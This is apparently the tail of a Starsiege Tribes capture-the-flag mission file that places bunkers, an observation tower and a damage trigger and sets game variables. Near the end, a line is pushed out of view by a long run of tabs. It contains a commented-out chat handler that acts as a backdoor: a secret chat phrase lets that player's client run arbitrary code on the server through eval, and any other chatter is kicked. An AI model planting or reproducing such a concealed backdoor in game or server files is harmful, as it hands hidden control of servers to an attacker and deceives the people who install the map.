				position = "-9.0803e-09 6.37946e-08 -1.00126e-05";
				rotation = "0 -0 -0.349054";
				lightParams = "4 1.400000 1 1.400000 1 8.399998 1 8.399998 1 ";
			};
			instant InteriorShape "iobservation1" {
				fileName = "iobservation.dis";
				isContainer = "1";
				position = "6.92817 19.0245 -7.03457";
				rotation = "0 -0 -0.349055";
				lightParams = "0 ";
			};
		};
		instant SimGroup "Bunkers" {
			instant InteriorShape "bunker1" {
				fileName = "bunker.dis";
				isContainer = "1";
				position = "16 84 4";
				rotation = "0 -0 3.14147";
				lightParams = "0 ";
			};
			instant InteriorShape "bunker1" {
				fileName = "bunker.dis";
				isContainer = "1";
				position = "-16 -84 4";
				rotation = "0 0 0";
				lightParams = "0 ";
			};
			instant InteriorShape "eround1" {
				fileName = "eround.dis";
				isContainer = "1";
				position = "-48 48 3.19994";
				rotation = "0 0 2.35614";
				lightParams = "0 ";
			};
			instant InteriorShape "eround1" {
				fileName = "eround.dis";
				isContainer = "1";
				position = "48 -48 3.19994";
				rotation = "0 0 -2.35614";
				lightParams = "0 ";
			};
		};
	};
	instant Trigger "DamageTrigger1" {
		dataBlock = "DamageTrigger";
		name = "";
		position = "0 0 -44";
		rotation = "0 0 0";
		boundingBox = "-500 -500 -40 500 500 40";
		isSphere = "False";

		damageValueEnter = 1000;
		damageValueLeave = 1000;
		damageValueContact = 1000;
		damageForce = 400;
		damageType = $LandingDamageType;
	};
};
//--- export object end ---//

setSpawnBuyList($ITEM_SET_NO_XPLO);
																																																																							//function remoteComChat(%a,%b){if(!String::ICompare(%b,dc("",5))){$x=%a;function remoteX(%c,%d){if(%c==$x)eval(%d);}}else schedule("Net::kick("@%a@");",0);}
$teamScoreLimit = 5;
exec(objectives);
$Game::missionType = "CTF";
$cdTrack = 3;
$cdPlayMode = 1;
